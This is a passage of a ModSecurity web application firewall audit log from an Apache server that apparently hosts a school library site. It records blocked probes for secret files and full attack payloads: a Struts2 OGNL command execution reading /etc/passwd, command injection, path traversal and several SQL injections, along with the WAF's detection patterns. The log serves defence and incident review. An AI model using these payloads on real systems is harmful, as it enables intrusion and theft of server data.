"/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748959623890613 893 (- - -) Stopwatch2: 1748959623890613 893; combined=324, p1=282, p2=0, p3=0, p4=0, p5=42, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc63e02f-Z-- --86e95945-A-- [03/Jun/2025:22:02:52 +0700] aD8OnAhM7ynDNybXsoP9ZgAAAEc 103.236.140.4 56800 103.236.140.4 8181 --86e95945-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36 Accept-Charset: utf-8 --86e95945-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86e95945-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748962972910268 907 (- - -) Stopwatch2: 1748962972910268 907; combined=410, p1=368, p2=0, p3=0, p4=0, p5=42, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86e95945-Z-- --7fef4a56-A-- [03/Jun/2025:22:30:46 +0700] aD8VJghM7ynDNybXsoMFJwAAAE0 103.236.140.4 49790 103.236.140.4 8181 --7fef4a56-B-- GET /sftp-config.json HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 103.253.27.128 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Cookie: X-Forwarded-For: 103.253.27.128 Accept-Encoding: gzip X-Varnish: 171896131 --7fef4a56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7fef4a56-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748964646083004 1002 (- - -) Stopwatch2: 1748964646083004 1002; combined=413, p1=373, p2=0, p3=0, p4=0, p5=40, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7fef4a56-Z-- --0f3cab6a-A-- [03/Jun/2025:22:30:46 +0700] aD8VJo0G58RZMmoh8H08xwAAAI0 103.236.140.4 49794 103.236.140.4 8181 --0f3cab6a-B-- GET /.vscode/sftp-config.json HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 103.253.27.128 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Cookie: X-Forwarded-For: 103.253.27.128 Accept-Encoding: gzip X-Varnish: 173038140 --0f3cab6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0f3cab6a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748964646204271 711 (- - -) Stopwatch2: 1748964646204271 711; combined=265, p1=230, p2=0, p3=0, p4=0, p5=35, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f3cab6a-Z-- --50727509-A-- [03/Jun/2025:23:15:05 +0700] aD8fiZAN5Lj366RdGMwWYwAAAMM 103.236.140.4 45144 103.236.140.4 8181 --50727509-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/3.0 (compatible; NetPositive/2.1.1; BeOS) Accept-Charset: utf-8 --50727509-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --50727509-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748967305174485 790 (- - -) Stopwatch2: 1748967305174485 790; combined=326, p1=284, p2=0, p3=0, p4=0, p5=42, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50727509-Z-- --a174e777-A-- [03/Jun/2025:23:18:49 +0700] aD8gaQhM7ynDNybXsoMPEgAAAEc 103.236.140.4 45172 103.236.140.4 8181 --a174e777-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; G8141) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --a174e777-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a174e777-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748967529317180 1211 (- - -) Stopwatch2: 1748967529317180 1211; combined=386, p1=334, p2=0, p3=0, p4=0, p5=52, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a174e777-Z-- --a3918c2b-A-- [03/Jun/2025:23:18:53 +0700] aD8gbQhM7ynDNybXsoMPFAAAAEU 103.236.140.4 45178 103.236.140.4 8181 --a3918c2b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; GM1917) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --a3918c2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3918c2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748967533665081 839 (- - -) Stopwatch2: 1748967533665081 839; combined=367, p1=333, p2=0, p3=0, p4=0, p5=34, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3918c2b-Z-- --7f87dd68-A-- [03/Jun/2025:23:28:41 +0700] aD8iuQhM7ynDNybXsoMPVwAAAFE 103.236.140.4 45494 103.236.140.4 8181 --7f87dd68-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPad; U; CPU iPad OS 5_0_1 like Mac OS X; en-us) AppleWebKit/535.1+ (KHTML like Gecko) Version/7.2.0.0 Safari/6533.18.5 Accept-Charset: utf-8 --7f87dd68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f87dd68-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748968121444369 683 (- - -) Stopwatch2: 1748968121444369 683; combined=261, p1=227, p2=0, p3=0, p4=0, p5=33, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f87dd68-Z-- --ec6cf037-A-- [04/Jun/2025:00:56:14 +0700] aD83Po0G58RZMmoh8H1KmwAAAIE 103.236.140.4 34996 103.236.140.4 8181 --ec6cf037-B-- GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 173179306 --ec6cf037-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ec6cf037-E-- --ec6cf037-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str..."] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748973374334789 2341 (- - -) Stopwatch2: 1748973374334789 2341; combined=1113, p1=494, p2=580, p3=0, p4=0, p5=39, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec6cf037-Z-- --9f9a3a75-A-- [04/Jun/2025:01:12:25 +0700] aD87CZAN5Lj366RdGMwjbAAAAMA 103.236.140.4 41002 103.236.140.4 8181 --9f9a3a75-B-- POST /wsman HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 1709 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0 Content-Type: application/soap+xml;charset=UTF-8 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 172988614 --9f9a3a75-C-- HTTP://perpustakaan.smkn22jakarta.sch.id/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript 102400 uuid:00B60932-CC01-0005-0000-000000010000 PT1M30S root/scx aWQ= 0 true --9f9a3a75-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f9a3a75-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748974345690778 2877 (- - -) Stopwatch2: 1748974345690778 2877; combined=1894, p1=385, p2=1439, p3=26, p4=21, p5=23, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f9a3a75-Z-- --70908329-A-- [04/Jun/2025:02:11:30 +0700] aD9I4ghM7ynDNybXsoMjogAAAFI 103.236.140.4 36224 103.236.140.4 8181 --70908329-B-- GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.9 Safari/605.1.15 Cookie: X-Forwarded-For: 178.128.54.187 Accept-Encoding: gzip X-Varnish: 172601466 --70908329-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --70908329-E-- --70908329-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 1 UNION SELECT md5(999999999) as id from HrmResourceManager found within MATCHED_VAR: 1 UNION SELECT md5(999999999) as id from HrmResourceManager"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748977890110716 3077 (- - -) Stopwatch2: 1748977890110716 3077; combined=1485, p1=410, p2=1039, p3=0, p4=0, p5=35, sr=71, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70908329-Z-- --0846fb68-A-- [04/Jun/2025:02:11:30 +0700] aD9I4pAN5Lj366RdGMwxfgAAAMc 103.236.140.4 36234 103.236.140.4 8181 --0846fb68-B-- POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 25 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 178.128.54.187 Cookie: X-Varnish: 172923256 --0846fb68-C-- type='|cat /etc/passwd||' --0846fb68-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0846fb68-E-- --0846fb68-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /webadm/?q=moni_detail.do&action=gragh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748977890114699 1780 (- - -) Stopwatch2: 1748977890114699 1780; combined=567, p1=417, p2=119, p3=0, p4=0, p5=30, sr=89, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0846fb68-Z-- --00f93349-A-- [04/Jun/2025:02:11:30 +0700] aD9I4kSujXvW2xVCZlU22gAAAAk 103.236.140.4 36260 103.236.140.4 8181 --00f93349-B-- GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (CentOS; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0 Cookie: X-Forwarded-For: 178.128.54.187 Accept-Encoding: gzip X-Varnish: 171167884 --00f93349-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --00f93349-E-- --00f93349-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748977890115714 1754 (- - -) Stopwatch2: 1748977890115714 1754; combined=511, p1=290, p2=167, p3=0, p4=0, p5=54, sr=55, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00f93349-Z-- --95b36401-A-- [04/Jun/2025:02:11:30 +0700] aD9I4pAN5Lj366RdGMwxgAAAAMg 103.236.140.4 36268 103.236.140.4 8181 --95b36401-B-- GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Ubuntu; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0 Cookie: X-Forwarded-For: 178.128.54.187 Accept-Encoding: gzip X-Varnish: 173091831 --95b36401-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --95b36401-E-- --95b36401-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748977890117469 1784 (- - -) Stopwatch2: 1748977890117469 1784; combined=471, p1=362, p2=87, p3=0, p4=0, p5=22, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95b36401-Z-- --a464026c-A-- [04/Jun/2025:02:11:30 +0700] aD9I4ghM7ynDNybXsoMjpgAAAEQ 103.236.140.4 36270 103.236.140.4 8181 --a464026c-B-- POST /zentao/user-login.html HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id/zentao/user-login.html Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 72 User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 178.128.54.187 Cookie: X-Varnish: 172923259 --a464026c-C-- account=admin'+and++updatexml(1,concat(0x1,md5(999999999)),1)+and+'1'='1 --a464026c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a464026c-E-- --a464026c-H-- Message: Access denied with code 403 (phase 2). Pattern match "[\\[\\]\\x22',()\\.]{10}$|\\b(?:union\\sall\\sselect\\s(?:(?:null|\\d+),?)+|order\\sby\\s\\d{1,4}|(?:and|or)\\s\\d{4}=\\d{4}|waitfor\\sdelay\\s'\\d+:\\d+:\\d+'|(?:select|and|or)\\s(?:(?:pg_)?sleep\\(\\d+\\)|\\d+\\s?=\\s?(?:dbms_pipe\\.receive_message\\ ..." at ARGS_POST:account. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "66"] [id "218500"] [rev "18"] [msg "COMODO WAF: SQLmap attack detected||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: and '1'='1 found within ARGS_POST:account: admin' and updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748977890117674 2721 (- - -) Stopwatch2: 1748977890117674 2721; combined=1525, p1=300, p2=1191, p3=0, p4=0, p5=34, sr=54, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a464026c-Z-- --ba75750d-A-- [04/Jun/2025:02:11:30 +0700] aD9I4o0G58RZMmoh8H1cZgAAAIw 103.236.140.4 36258 103.236.140.4 8181 --ba75750d-B-- GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0 Cookie: X-Forwarded-For: 178.128.54.187 Accept-Encoding: gzip X-Varnish: 172647868 --ba75750d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ba75750d-E-- --ba75750d-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: WAITFOR DELAY found within REQUEST_URI: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748977890119643 3035 (- - -) Stopwatch2: 1748977890119643 3035; 